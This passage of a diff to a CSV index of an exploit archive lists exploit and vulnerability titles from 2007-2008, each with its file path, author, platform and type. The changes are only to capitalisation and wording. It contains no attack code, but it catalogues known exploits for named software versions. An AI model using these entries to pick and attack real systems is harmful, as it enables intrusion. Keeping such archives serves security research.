Escalation",2007-10-23,KiNgOfThEwOrLd,php,webapps,0 4562,platforms/php/webapps/4562.txt,"Flatnuke 3 Remote Cookie Manipoulation / Privilege Escalation",2007-10-23,KiNgOfThEwOrLd,php,webapps,0 -4563,platforms/php/webapps/4563.txt,"PHP-Nuke Platinum 7.6.b.5 Remote File Inclusion Vulnerability",2007-10-23,BiNgZa,php,webapps,0 +4563,platforms/php/webapps/4563.txt,"php-nuke platinum 7.6.b.5 - Remote File Inclusion Vulnerability",2007-10-23,BiNgZa,php,webapps,0 4564,platforms/multiple/local/4564.txt,"Oracle 10g CTX_DOC.MARKUP SQL Injection Exploit",2007-10-23,Sh2kerr,multiple,local,0 4565,platforms/php/webapps/4565.txt,"PHP Image 1.2 Multiple Remote File Inclusion Vulnerabilities",2007-10-23,Civi,php,webapps,0 4566,platforms/windows/remote/4566.rb,"eIQnetworks ESA SEARCHREPORT Remote Overflow Exploit (meta)",2007-10-24,ri0t,windows,remote,10616 @@ -4274,13 +4274,13 @@ id,file,description,date,author,platform,type,port 4629,platforms/php/webapps/4629.txt,"net-finity (links.php) Remote SQL Injection Vulnerability",2007-11-16,VerY-SecReT,php,webapps,0 4630,platforms/php/webapps/4630.txt,"meBiblio 0.4.5 (index.php action) Remote File Inclusion Vulnerability",2007-11-17,ShAy6oOoN,php,webapps,0 4631,platforms/php/webapps/4631.txt,"phpBBViet <= 02.03.2007 (phpbb_root_path) Remote File Inclusion",2007-11-17,"Mehmet Ince",php,webapps,0 -4632,platforms/php/webapps/4632.txt,"VigileCMS 1.4 Multiple Remote Vulnerabilities",2007-11-18,DevilAuron,php,webapps,0 +4632,platforms/php/webapps/4632.txt,"vigilecms 1.4 Multiple Vulnerabilities",2007-11-18,DevilAuron,php,webapps,0 4633,platforms/php/webapps/4633.txt,"HotScripts Clone Script Remote SQL Injection Vulnerability",2007-11-18,t0pP8uZz,php,webapps,0 4634,platforms/php/webapps/4634.php,"IceBB 1.0-rc6 Remote Database Authentication Details Exploit",2007-11-18,Gu1ll4um3r0m41n,php,webapps,0 4635,platforms/php/webapps/4635.php,"Sciurus Hosting Panel Remote Code Injection Exploit",2007-11-18,Liz0ziM,php,webapps,0 -4636,platforms/php/webapps/4636.txt,"Joomla Component JUser 1.0.14 Remote File Inclusion Vulnerability",2007-11-19,NoGe,php,webapps,0 -4637,platforms/php/webapps/4637.txt,"bcoos 1.0.10 (LFI / SQL Injection) Multiple Remote Vulnerabilities",2007-11-20,BugReport.IR,php,webapps,0 -4638,platforms/php/webapps/4638.txt,"SkyPortal vRC6 Multiple Remote Vulnerabilities",2007-11-20,BugReport.IR,php,webapps,0 +4636,platforms/php/webapps/4636.txt,"joomla component juser 1.0.14 - Remote File Inclusion Vulnerability",2007-11-19,NoGe,php,webapps,0 +4637,platforms/php/webapps/4637.txt,"bcoos 1.0.10 (lfi / sql injection) Multiple Vulnerabilities",2007-11-20,BugReport.IR,php,webapps,0 +4638,platforms/php/webapps/4638.txt,"skyportal vrc6 Multiple Vulnerabilities",2007-11-20,BugReport.IR,php,webapps,0 4639,platforms/php/webapps/4639.htm,"Ucms <= 1.8 Backdoor Remote Command Execution Exploit",2007-11-21,D4m14n,php,webapps,0 4640,platforms/php/webapps/4640.txt,"TalkBack 2.2.7 Multiple Remote File Inclusion Vulnerabilities",2007-11-21,NoGe,php,webapps,0 4641,platforms/php/webapps/4641.txt,"alstrasoft E-Friends <= 4.98 (seid) Multiple SQL Injection Vulnerabilities",2007-11-21,K-159,php,webapps,0 @@ -4323,7 +4323,7 @@ id,file,description,date,author,platform,type,port 4678,platforms/php/webapps/4678.php,"Seditio CMS <= 121 Remote SQL Injection Exploit",2007-11-29,InATeam,php,webapps,0 4679,platforms/php/webapps/4679.txt,"KML share 1.1 (region.php layer) Remote File Disclosure Vulnerability",2007-11-29,GoLd_M,php,webapps,0 4680,platforms/php/webapps/4680.txt,"LearnLoop 2.0beta7 (sFilePath) Remote File Disclosure Vulnerability",2007-11-29,GoLd_M,php,webapps,0 -4681,platforms/php/webapps/4681.txt,"FTP Admin 0.1.0 (LFI/XSS/AB) Multiple Remote Vulnerabilities",2007-11-29,Omni,php,webapps,0 +4681,platforms/php/webapps/4681.txt,"ftp admin 0.1.0 (lfi/xss/ab) Multiple Vulnerabilities",2007-11-29,Omni,php,webapps,0 4682,platforms/windows/dos/4682.c,"Windows Media Player AIFF Divide By Zero Exception DoS PoC",2007-11-29,"Gil-Dong / Woo-Chi",windows,dos,0 4683,platforms/windows/dos/4683.py,"RealPlayer 11 Malformed AU File Denial of Service Exploit",2007-12-01,NtWaK0,windows,dos,0 4684,platforms/php/webapps/4684.txt,"tellmatic 1.0.7 Multiple Remote File Inclusion Vulnerabilities",2007-12-01,ShAy6oOoN,php,webapps,0 @@ -4341,8 +4341,8 @@ id,file,description,date,author,platform,type,port 4696,platforms/php/webapps/4696.txt,"SerWeb <= 2.0.0 dev1 2007-02-20 - Multiple RFI / LFI Vulnerabilities",2007-12-06,GoLd_M,php,webapps,0 4697,platforms/asp/webapps/4697.txt,"MWOpen E-Commerce leggi_commenti.asp Remote SQL Injection",2007-12-06,KiNgOfThEwOrLd,asp,webapps,0 4698,platforms/linux/local/4698.c,"Send ICMP Nasty Garbage (sing) Append File Logrotate Exploit",2007-12-06,bannedit,linux,local,0 -4699,platforms/windows/remote/4699.txt,"Firefly Media Server (mt-daapd) 2.4.1 / SVN 1699 Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",windows,remote,0 -4700,platforms/windows/remote/4700.txt,"Simple HTTPD <= 1.38 Multiple Remote Vulnerabilities",2007-12-07,"Luigi Auriemma",windows,remote,0 +4699,platforms/windows/remote/4699.txt,"firefly media server (mt-daapd) 2.4.1 / svn 1699 - Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",windows,remote,0 +4700,platforms/windows/remote/4700.txt,"simple httpd <= 1.38 Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",windows,remote,0 4701,platforms/windows/local/4701.pl,"Media Player Classic 6.4.9 MP4 File Stack Overflow Exploit",2007-12-08,"SYS 49152",windows,local,0 4702,platforms/windows/local/4702.pl,"Windows Media Player 6.4 MP4 File Stack Overflow PoC",2007-12-08,"SYS 49152",windows,local,0 4703,platforms/windows/local/4703.pl,"Nullsoft Winamp 5.32 MP4 tags Stack Overflow Exploit",2007-12-08,"SYS 49152",windows,local,0 @@ -4353,18 +4353,18 @@ id,file,description,date,author,platform,type,port 4708,platforms/php/webapps/4708.txt,"DWdirectory <= 2.1 Remote SQL Injection Vulnerability",2007-12-09,t0pP8uZz,php,webapps,0 4709,platforms/php/webapps/4709.txt,"SH-News 3.0 (comments.php id) Remote SQL Injection Vulnerability",2007-12-09,hadihadi,php,webapps,0 4710,platforms/php/webapps/4710.txt,"Lotfian.com DATABASE DRIVEN TRAVEL SITE SQL Injection Vuln",2007-12-10,"Aria-Security Team",php,webapps,0 -4711,platforms/php/webapps/4711.txt,"Falt4 CMS RC4 10.9.2007 Multiple Remote Vulnerabilities",2007-12-10,"H-Security Labs",php,webapps,0 -4712,platforms/php/webapps/4712.txt,"Falcon CMS 1.4.3 (RFI/XSS) Multiple Remote Vulnerabilities",2007-12-10,MhZ91,php,webapps,0 -4713,platforms/windows/remote/4713.txt,"BarracudaDrive <= 3.7.2 Multiple Remote Vulnerabilities",2007-12-10,"Luigi Auriemma",windows,remote,0 +4711,platforms/php/webapps/4711.txt,"falt4 cms rc4 10.9.2007 Multiple Vulnerabilities",2007-12-10,"H-Security Labs",php,webapps,0 +4712,platforms/php/webapps/4712.txt,"falcon cms 1.4.3 (rfi/xss) Multiple Vulnerabilities",2007-12-10,MhZ91,php,webapps,0 +4713,platforms/windows/remote/4713.txt,"barracudadrive <= 3.7.2 Multiple Vulnerabilities",2007-12-10,"Luigi Auriemma",windows,remote,0 4714,platforms/php/webapps/4714.pl,"MonAlbum 0.87 Upload Shell / Password Grabber Exploit",2007-12-10,v0l4arrra,php,webapps,0 -4715,platforms/windows/remote/4715.txt,"BadBlue <= 2.72b Multiple Remote Vulnerabilities",2007-12-10,"Luigi Auriemma",windows,remote,0 +4715,platforms/windows/remote/4715.txt,"badblue <= 2.72b Multiple Vulnerabilities",2007-12-10,"Luigi Auriemma",windows,remote,0 4716,platforms/windows/dos/4716.html,"Online Media Technologies AVSMJPEGFILE.DLL 1.1 Remote BoF PoC",2007-12-11,shinnai,windows,dos,0 4717,platforms/windows/dos/4717.py,"Simple HTTPD <= 1.41 (/aux) Remote Denial of Service Exploit",2007-12-11,shinnai,windows,dos,0 4718,platforms/php/webapps/4718.rb,"SquirrelMail G/PGP Plugin deletekey() Command Injection Exploit",2007-12-11,Backdoored,php,webapps,0 4719,platforms/php/webapps/4719.txt,"Mcms Easy Web Make (index.php template) Local File Inclusion Vuln",2007-12-11,MhZ91,php,webapps,0 4720,platforms/windows/remote/4720.html,"HP Compaq Notebooks ActiveX Remote Code Execution Exploit",2007-12-11,porkythepig,windows,remote,0 4721,platforms/php/webapps/4721.txt,"Wordpress <= 2.3.1 Charset Remote SQL Injection Vulnerability",2007-12-11,"Abel Cheung",php,webapps,0 -4722,platforms/php/webapps/4722.txt,"ViArt CMS/Shop/HelpDesk 3.3.2 Remote File Inclusion Vulnerability",2007-12-11,RoMaNcYxHaCkEr,php,webapps,0 +4722,platforms/php/webapps/4722.txt,"viart cms/shop/helpdesk 3.3.2 - Remote File Inclusion Vulnerability",2007-12-11,RoMaNcYxHaCkEr,php,webapps,0 4723,platforms/osx/dos/4723.c,"Apple Mac OS X xnu <= 1228.0 super_blob Local kernel Denial of Service PoC",2007-12-12,mu-b,osx,dos,0 4724,platforms/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 CGI Remote BoF Exploit",2007-12-12,muts,windows,remote,80 4725,platforms/php/webapps/4725.txt,"Fastpublish CMS 1.9999 config[fsBase] RFI Vulnerability",2007-12-12,RoMaNcYxHaCkEr,php,webapps,0 @@ -4372,7 +4372,7 @@ id,file,description,date,author,platform,type,port 4727,platforms/php/webapps/4727.txt,"CMS Galaxie Software (category_id) Remote SQL Injection Vulnerability",2007-12-13,MurderSkillz,php,webapps,0 4728,platforms/php/webapps/4728.txt,"MMS Gallery PHP 1.0 (id) Remote File Disclosure Vulnerability",2007-12-13,GoLd_M,php,webapps,0 4729,platforms/php/webapps/4729.txt,"xml2owl 0.1.1 (filedownload.php) Remote File Disclosure Vulnerability",2007-12-13,GoLd_M,php,webapps,0 -4730,platforms/asp/webapps/4730.txt,"Hosting Controller 6.1 Hot fix <= 3.3 Multiple Remote Vulnerabilities",2007-12-13,BugReport.IR,asp,webapps,0 +4730,platforms/asp/webapps/4730.txt,"hosting controller 6.1 hot fix <= 3.3 Multiple Vulnerabilities",2007-12-13,BugReport.IR,asp,webapps,0 4731,platforms/php/webapps/4731.php,"Adult Script <= 1.6 Unauthorized Administrative Access Exploit",2007-12-13,Liz0ziM,php,webapps,0 4732,platforms/linux/dos/4732.c,"Samba 3.0.27a send_mailslot() Remote Buffer Overflow PoC",2007-12-14,x86,linux,dos,0 4733,platforms/php/webapps/4733.txt,"123tkShop 0.9.1 Remote Authentication Bypass Vulnerability",2007-12-14,"Michael Brooks",php,webapps,0 @@ -4380,7 +4380,7 @@ id,file,description,date,author,platform,type,port 4735,platforms/php/webapps/4735.txt,"Oreon 1.4 / Centreon 1.4.1 Multiple RFI Vulnerabilties",2007-12-14,"Michael Brooks",php,webapps,0 4736,platforms/php/webapps/4736.txt,"Form Tools 1.5.0b Multiple Remote File Inclusion Vulnerabilities",2007-12-14,RoMaNcYxHaCkEr,php,webapps,0 4737,platforms/php/webapps/4737.txt,"PHP Real Estate (fullnews.php id) Remote SQL Injection Vulnerability",2007-12-14,t0pP8uZz,php,webapps,0 -4738,platforms/php/webapps/4738.txt,"GF-3XPLORER 2.4 (XSS/LFI/Etc.) Multiple Remote Vulnerabilities",2007-12-18,MhZ91,php,webapps,0 +4738,platforms/php/webapps/4738.txt,"gf-3xplorer 2.4 (xss/lfi/etc.) Multiple Vulnerabilities",2007-12-18,MhZ91,php,webapps,0 4739,platforms/php/webapps/4739.pl,"MOG-WebShop (index.php group) Remote SQL Injection Exploit",2007-12-18,k1tk4t,php,webapps,0 4740,platforms/php/webapps/4740.pl,"FreeWebshop 2.2.1 Remote Blind SQL Injection Exploit",2007-12-18,k1tk4t,php,webapps,0 4741,platforms/php/webapps/4741.txt,"MySpace Content Zone 3.x Remote File Upload Vulnerability",2007-12-18,Don,php,webapps,0 @@ -4398,7 +4398,7 @@ id,file,description,date,author,platform,type,port 4754,platforms/windows/remote/4754.pl,"3proxy 0.5.3g logurl() Remote Buffer Overflow Exploit (win32) (pl)",2007-12-18,"Marcin Kozlowski",windows,remote,3128 4755,platforms/php/webapps/4755.txt,"PhpMyDesktop/Arcade 1.0 Final - (phpdns_basedir) RFI Vulnerability",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 4756,platforms/linux/local/4756.c,"Linux Kernel < 2.6.11.5 BLUETOOTH Stack Local Root Exploit",2007-12-18,Backdoored,linux,local,0 -4757,platforms/windows/dos/4757.txt,"HP Software Update client 3.0.8.4 Multiple Remote Vulnerabilities",2007-12-19,porkythepig,windows,dos,0 +4757,platforms/windows/dos/4757.txt,"hp software update client 3.0.8.4 Multiple Vulnerabilities",2007-12-19,porkythepig,windows,dos,0 4758,platforms/php/webapps/4758.txt,"xeCMS 1.x (view.php list) Remote File Disclosure Vulnerability",2007-12-19,p4imi0,php,webapps,0 4759,platforms/osx/local/4759.c,"Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit",2007-12-19,"Subreption LLC.",osx,local,0 4760,platforms/windows/remote/4760.txt,"MS Windows 2000 AS SP4 Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0 @@ -4406,7 +4406,7 @@ id,file,description,date,author,platform,type,port 4762,platforms/php/webapps/4762.txt,"nicLOR CMS (sezione_news.php) Remote SQL Injection Vulnerability",2007-12-21,x0kster,php,webapps,0 4763,platforms/php/webapps/4763.txt,"NmnNewsletter 1.0.7 (output) Remote File Inclusion Vulnerability",2007-12-21,CraCkEr,php,webapps,0 4764,platforms/php/webapps/4764.txt,"Arcadem LE 2.04 (loadadminpage) Remote File Inclusion Vulnerability",2007-12-21,KnocKout,php,webapps,0 -4765,platforms/php/webapps/4765.txt,"1024 CMS 1.3.1 (LFI/SQL) Multiple Remote Vulnerabilities",2007-12-21,irk4z,php,webapps,0 +4765,platforms/php/webapps/4765.txt,"1024 cms 1.3.1 (lfi/sql) Multiple Vulnerabilities",2007-12-21,irk4z,php,webapps,0 4766,platforms/php/webapps/4766.txt,"mBlog 1.2 (page) Remote File Disclosure Vulnerability",2007-12-21,irk4z,php,webapps,0 4767,platforms/php/webapps/4767.txt,"Social Engine 2.0 Multiple Local File Inclusion Vulnerabilities",2007-12-21,MhZ91,php,webapps,0 4768,platforms/php/webapps/4768.py,"Shadowed Portal <= 5.7d3 Remote Command Execution Exploit",2007-12-21,The:Paradox,php,webapps,0 @@ -4431,7 +4431,7 @@ id,file,description,date,author,platform,type,port 4787,platforms/php/webapps/4787.pl,"RunCMS 1.6 Get Admin Cookie Remote Blind SQL Injection Exploit",2007-12-25,Sh2kerr,php,webapps,0 4788,platforms/php/webapps/4788.txt,"MailMachine Pro 2.2.4 Remote SQL Injection Vulnerability",2007-12-25,MhZ91,php,webapps,0 4789,platforms/php/webapps/4789.php,"PMOS Help Desk <= 2.4 Remote Command Execution Exploit",2007-12-25,EgiX,php,webapps,0 -4790,platforms/php/webapps/4790.txt,"RunCMS 1.6 Multiple Remote Vulnerabilities",2007-12-25,DSecRG,php,webapps,0 +4790,platforms/php/webapps/4790.txt,"runcms 1.6 Multiple Vulnerabilities",2007-12-25,DSecRG,php,webapps,0 4791,platforms/php/webapps/4791.txt,"eSyndiCat Link Exchange Script 2005-2006 SQL Injection Vulnerability",2007-12-25,EgiX,php,webapps,0 4792,platforms/php/webapps/4792.pl,"RunCMS 1.6 Remote Blind SQL Injection Exploit (IDS evasion)",2007-12-26,Sh2kerr,php,webapps,0 4793,platforms/php/webapps/4793.txt,"Blakord Portal <= Beta 1.3.A (all modules) SQL Injection Vulnerability",2007-12-26,JosS,php,webapps,0 @@ -4451,11 +4451,11 @@ id,file,description,date,author,platform,type,port 4808,platforms/php/webapps/4808.txt,"Mihalism Multi Forum Host <= 3.0.x Remote File Inclusion Vulnerability",2007-12-29,GoLd_M,php,webapps,0 4809,platforms/php/webapps/4809.txt,"CCMS 3.1 Demo Remote SQL Injection Exploit",2007-12-29,Pr0metheuS,php,webapps,0 4810,platforms/php/webapps/4810.txt,"CMS Made Simple <= 1.2.2 (TinyMCE module) SQL Injection Vuln",2007-12-30,EgiX,php,webapps,0 -4811,platforms/php/webapps/4811.txt,"Kontakt Formular 1.4 Remote File Inclusion Vulnerability",2007-12-30,bd0rk,php,webapps,0 +4811,platforms/php/webapps/4811.txt,"kontakt formular 1.4 - Remote File Inclusion Vulnerability",2007-12-30,bd0rk,php,webapps,0 4812,platforms/php/webapps/4812.txt,"Mihalism Multi Host 2.0.7 download.php Remote File Disclosure Vuln",2007-12-30,GoLd_M,php,webapps,0 4813,platforms/php/webapps/4813.txt,"XCMS <= 1.83 Remote Command Execution Exploit",2007-12-30,x0kster,php,webapps,0 4814,platforms/php/webapps/4814.txt,"Bitweaver R2 CMS Remote File Upload / Disclosure Vulnerabilities",2007-12-30,BugReport.IR,php,webapps,0 -4815,platforms/php/webapps/4815.txt,"MatPo Bilder Galerie 1.1 Remote File Inclusion Vulnerability",2007-12-30,Crackers_Child,php,webapps,0 +4815,platforms/php/webapps/4815.txt,"matpo bilder galerie 1.1 - Remote File Inclusion Vulnerability",2007-12-30,Crackers_Child,php,webapps,0 4816,platforms/php/webapps/4816.txt,"SanyBee Gallery 0.1.1 (p) Local File Inclusion Vulnerability",2007-12-30,jackal,php,webapps,0 4817,platforms/php/webapps/4817.txt,"w-Agora <= 4.2.1 (cat) Remote SQL Injection Vulnerability",2007-12-30,IHTeam,php,webapps,0 4818,platforms/windows/remote/4818.html,"IBM Domino Web Access Upload Module inotes6.dll BoF Exploit",2007-12-30,Elazar,windows,remote,0 @@ -4478,21 +4478,21 @@ id,file,description,date,author,platform,type,port 4835,platforms/php/webapps/4835.py,"WebPortal CMS 0.6-beta Remote Password Change Exploit",2008-01-04,The:Paradox,php,webapps,0 4836,platforms/php/webapps/4836.txt,"samPHPweb (songinfo.php) Remote SQL Injection Vulnerability",2008-01-05,BackDoor,php,webapps,0 4837,platforms/php/webapps/4837.pl,"ClipShare 2.6 Remote User Password Change Exploit",2008-01-05,Pr0metheuS,php,webapps,0 -4838,platforms/php/webapps/4838.txt,"SNETWORKS PHP CLASSIFIEDS 5.0 Remote File Inclusion Vulnerability",2008-01-05,Crackers_Child,php,webapps,0 +4838,platforms/php/webapps/4838.txt,"snetworks php classifieds 5.0 - Remote File Inclusion Vulnerability",2008-01-05,Crackers_Child,php,webapps,0 4839,platforms/windows/local/4839.pl,"CoolPlayer 2.17 .m3u Playlist Stack Overflow Exploit",2008-01-05,Trancek,windows,local,0 4840,platforms/php/webapps/4840.php,"Tribisur <= 2.0 Remote SQL Injection Exploit",2008-01-05,x0kster,php,webapps,0 4841,platforms/php/webapps/4841.txt,"Invision Power Board <= 2.1.7 ACTIVE XSS/SQL Injection Exploit",2008-01-05,"Eugene Minaev",php,webapps,0 4842,platforms/php/webapps/4842.pl,"NetRisk 1.9.7 (change_submit.php) Remote Password Change Exploit",2008-01-05,Cod3rZ,php,webapps,0 -4843,platforms/php/webapps/4843.txt,"MODx CMS 0.9.6.1 Multiple Remote Vulnerabilities",2008-01-05,BugReport.IR,php,webapps,0 +4843,platforms/php/webapps/4843.txt,"modx cms 0.9.6.1 Multiple Vulnerabilities",2008-01-05,BugReport.IR,php,webapps,0 4844,platforms/php/webapps/4844.txt,"Wordpress Plugin Wp-FileManager 1.2 Remote Upload Vulnerability",2008-01-06,Houssamix,php,webapps,0 4845,platforms/php/webapps/4845.pl,"RunCMS Newbb_plus <= 0.92 Client IP Remote SQL Injection Exploit",2008-01-06,"Eugene Minaev",php,webapps,0 4846,platforms/php/webapps/4846.txt,"Uebimiau Web-Mail 2.7.10/2.7.2 Remote File Disclosure Vulnerability",2008-01-06,"Eugene Minaev",php,webapps,0 4847,platforms/php/webapps/4847.txt,"XOOPS mod_gallery Zend_Hash_key + Extract RFI Vulnerability",2008-01-06,"Eugene Minaev",php,webapps,0 -4848,platforms/asp/webapps/4848.txt,"PortalApp 4.0 (SQL/XSS/Auth Bypasses) Multiple Remote Vulnerabilities",2008-01-06,r3dm0v3,asp,webapps,0 +4848,platforms/asp/webapps/4848.txt,"portalapp 4.0 (sql/xss/auth bypasses) Multiple Vulnerabilities",2008-01-06,r3dm0v3,asp,webapps,0 4849,platforms/php/webapps/4849.txt,"LoudBlog <= 0.6.1 (parsedpage) Remote Code Execution Vulnerability",2008-01-06,"Eugene Minaev",php,webapps,0 4850,platforms/php/webapps/4850.txt,"Horde Web-Mail 3.x (go.php) Remote File Disclosure Vulnerability",2008-01-06,"Eugene Minaev",php,webapps,0 4851,platforms/php/webapps/4851.txt,"CuteNews 1.1.1 (html.php) Remote Code Execution Vulnerability",2008-01-06,"Eugene Minaev",php,webapps,0 -4852,platforms/php/webapps/4852.txt,"NetRisk 1.9.7 (XSS/SQL) Multiple Remote Vulnerabilities",2008-01-06,"Virangar Security",php,webapps,0 +4852,platforms/php/webapps/4852.txt,"netrisk 1.9.7 (xss/sql) Multiple Vulnerabilities",2008-01-06,"Virangar Security",php,webapps,0 4853,platforms/php/webapps/4853.php,"DCP-Portal <= 6.11 Remote SQL Injection Exploit",2008-01-06,x0kster,php,webapps,0 4854,platforms/php/webapps/4854.txt,"SineCMS <= 2.3.5 Local File Inclusion / RCE Vulnerabilities",2008-01-06,KiNgOfThEwOrLd,php,webapps,0 4855,platforms/php/webapps/4855.txt,"Shop-Script 2.0 index.php Remote File Disclosure Vulnerability",2008-01-06,Fisher762,php,webapps,0 @@ -4505,7 +4505,7 @@ id,file,description,date,author,platform,type,port 4862,platforms/linux/remote/4862.py,"ClamAV 0.91.2 libclamav MEW PE Buffer Overflow Exploit",2008-01-07,"Thomas Pollet",linux,remote,0 4863,platforms/php/webapps/4863.pl,"SmallNuke 2.0.4 Pass Recovery Remote SQL Injection Exploit",2008-01-08,"Eugene Minaev",php,webapps,0 4864,platforms/php/webapps/4864.txt,"Zero CMS 1.0 Alpha Arbitrary File Upload / SQL Injection Vulnerabilities",2008-01-08,KiNgOfThEwOrLd,php,webapps,0 -4865,platforms/php/webapps/4865.txt,"EvilBoard 0.1a (SQL/XSS) Multiple Remote Vulnerabilities",2008-01-08,seaofglass,php,webapps,0 +4865,platforms/php/webapps/4865.txt,"evilboard 0.1a (sql/xss) Multiple Vulnerabilities",2008-01-08,seaofglass,php,webapps,0 4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing Remote Stack Overflow Exploit",2008-01-08,ryujin,windows,remote,0 4867,platforms/php/webapps/4867.pl,"PHP Webquest 2.6 (id_actividad) Remote SQL Injection Exploit",2008-01-08,ka0x,php,webapps,0 4868,platforms/windows/remote/4868.html,"Move Networks Quantum Streaming Player SEH Overwrite Exploit",2008-01-08,Elazar,windows,remote,0 @@ -4558,16 +4558,16 @@ id,file,description,date,author,platform,type,port 4916,platforms/php/webapps/4916.txt,"FaScript FaPersian Petition (show.php) SQL Injection Vulnerability",2008-01-15,IRCRASH,php,webapps,0 4917,platforms/php/webapps/4917.txt,"FaScript FaPersianHack 1.0 - (show.php) SQL Injection Vulnerability",2008-01-15,IRCRASH,php,webapps,0 4918,platforms/windows/remote/4918.html,"RTS Sentry Digital Surveillance (CamPanel.dll 2.1.0.2) BOF Exploit",2008-01-16,rgod,windows,remote,0 -4919,platforms/php/webapps/4919.txt,"Blogcms 4.2.1b (SQL/XSS) Multiple Remote Vulnerabilities",2008-01-16,DSecRG,php,webapps,0 +4919,platforms/php/webapps/4919.txt,"blogcms 4.2.1b (sql/xss) Multiple Vulnerabilities",2008-01-16,DSecRG,php,webapps,0 4920,platforms/php/webapps/4920.txt,"Aria 0.99-6 (effect.php page) Local File Inclusion Vulnerability",2008-01-16,DSecRG,php,webapps,0 4921,platforms/asp/webapps/4921.txt,"MailBee WebMail Pro 4.1 (ASP.NET) Remote File Disclosure Vulnerability",2008-01-16,-=M.o.B=-,asp,webapps,0 -4922,platforms/php/webapps/4922.txt,"ALITALK 1.9.1.1 Multiple Remote Vulnerabilities",2008-01-16,tomplixsee,php,webapps,0 -4923,platforms/windows/remote/4923.txt,"MiniWeb 0.8.19 Multiple Remote Vulnerabilities",2008-01-16,"Hamid Ebadi",windows,remote,0 +4922,platforms/php/webapps/4922.txt,"alitalk 1.9.1.1 Multiple Vulnerabilities",2008-01-16,tomplixsee,php,webapps,0 +4923,platforms/windows/remote/4923.txt,"miniweb 0.8.19 Multiple Vulnerabilities",2008-01-16,"Hamid Ebadi",windows,remote,0 4924,platforms/php/webapps/4924.php,"PixelPost 1.7 Remote Blind SQL Injection Exploit",2008-01-16,Silentz,php,webapps,0 4925,platforms/php/webapps/4925.txt,"PHP-RESIDENCE 0.7.2 (Search) Remote SQL Injection Vulnerability",2008-01-16,IRCRASH,php,webapps,0 4926,platforms/php/webapps/4926.pl,"Gradman <= 0.1.3 (agregar_info.php) Local File Inclusion Exploit",2008-01-16,JosS,php,webapps,0 4927,platforms/php/webapps/4927.php,"MyBulletinBoard (MyBB) <= 1.2.10 Remote Code Execution Exploit",2008-01-16,Silentz,php,webapps,0 -4928,platforms/php/webapps/4928.txt,"MyBulletinBoard (MyBB) <= 1.2.10 Multiple Remote Vulnerabilities",2008-01-16,waraxe,php,webapps,0 +4928,platforms/php/webapps/4928.txt,"mybulletinboard (mybb) <= 1.2.10 Multiple Vulnerabilities",2008-01-16,waraxe,php,webapps,0 4929,platforms/php/webapps/4929.txt,"PHPEcho CMS 2.0 (id) Remote SQL Injection Vulnerability",2008-01-17,Stack,php,webapps,0 4930,platforms/php/webapps/4930.txt,"Mini File Host 1.2 (upload.php language) LFI Vulnerability",2008-01-17,Scary-Boys,php,webapps,0 4931,platforms/windows/dos/4931.txt,"Crystal Reports XI Release 2 (Enterprise Tree Control) ActiveX BOF/DoS",2008-01-17,shinnai,windows,dos,0 @@ -4584,7 +4584,7 @@ id,file,description,date,author,platform,type,port 4942,platforms/php/webapps/4942.txt,"TikiWiki < 1.9.9 tiki-listmovies.php Directory Traversal Vulnerability",2008-01-20,Sha0,php,webapps,0 4943,platforms/php/webapps/4943.txt,"Frimousse 0.0.2 explorerdir.php Local Directory Traversal Vulnerability",2008-01-20,Houssamix,php,webapps,0 4944,platforms/php/webapps/4944.txt,"360 Web Manager 3.0 (IDFM) SQL Injection Vulnerability",2008-01-20,"Ded MustD!e",php,webapps,0 -4945,platforms/php/webapps/4945.txt,"Bloofox 0.3 (SQL/FD) Multiple Remote Vulnerabilities",2008-01-20,BugReport.IR,php,webapps,0 +4945,platforms/php/webapps/4945.txt,"bloofox 0.3 (sql/fd) Multiple Vulnerabilities",2008-01-20,BugReport.IR,php,webapps,0 4946,platforms/windows/remote/4946.html,"Toshiba Surveillance (MeIpCamX.DLL 1.0.0.4) Remote BOF Exploit",2008-01-20,rgod,windows,remote,0 4947,platforms/linux/remote/4947.c,"Axigen <= 5.0.2 AXIMilter Remote Format String Exploit",2008-01-21,hempel,linux,remote,0 4948,platforms/windows/remote/4948.txt,"Windows RSH daemon <= 1.8 Remote Buffer Overflow Exploit",2008-01-21,prdelka,windows,remote,0 @@ -4610,7 +4610,7 @@ id,file,description,date,author,platform,type,port 4968,platforms/php/webapps/4968.txt,"Foojan WMS 1.0 (index.php story) Remote SQL Injection Vulnerability",2008-01-23,IRCRASH,php,webapps,0 4969,platforms/php/webapps/4969.txt,"LulieBlog 1.02 (voircom.php id) Remote SQL Injection Vulnerability",2008-01-23,IRCRASH,php,webapps,0 4970,platforms/asp/webapps/4970.txt,"Web Wiz Forums <= 9.07 (sub) Remote Directory Traversal Vulnerability",2008-01-23,BugReport.IR,asp,webapps,0 -4971,platforms/asp/webapps/4971.txt,"Web Wiz Rich Text Editor 4.0 Multiple Remote Vulnerabilities",2008-01-23,BugReport.IR,asp,webapps,0 +4971,platforms/asp/webapps/4971.txt,"web wiz rich text editor 4.0 Multiple Vulnerabilities",2008-01-23,BugReport.IR,asp,webapps,0 4972,platforms/asp/webapps/4972.txt,"Web Wiz NewsPad 1.02 (sub) Remote Directory Traversal Vulnerability",2008-01-23,BugReport.IR,asp,webapps,0 4973,platforms/php/webapps/4973.txt,"Siteman 1.1.9 (cat) Remote File Disclosure Vulnerability",2008-01-23,IRCRASH,php,webapps,0 4974,platforms/windows/remote/4974.html,"Comodo AntiVirus 2.0 ExecuteStr() Remote Command Execution Exploit",2008-01-23,h07,windows,remote,0 @@ -4626,8 +4626,8 @@ id,file,description,date,author,platform,type,port 4985,platforms/php/webapps/4985.txt,"flinx <= 1.3 (category.php id) Remote SQL Injection Vulnerability",2008-01-25,Houssamix,php,webapps,0 4986,platforms/windows/remote/4986.html,"Sejoong Namo ActiveSquare 6 NamoInstaller.dll install Method Exploit",2008-01-25,plan-s,windows,remote,0 4987,platforms/windows/remote/4987.html,"Persits XUpload 3.0 AddFile() Remote Buffer Overflow Exploit",2008-01-25,Elazar,windows,remote,0 -4988,platforms/asp/webapps/4988.txt,"CandyPress eCommerce suite 4.1.1.26 Multiple Remote Vulnerabilities",2008-01-25,BugReport.IR,asp,webapps,0 -4989,platforms/php/webapps/4989.txt,"Simple Forum 3.2 (FD/XSS) Multiple 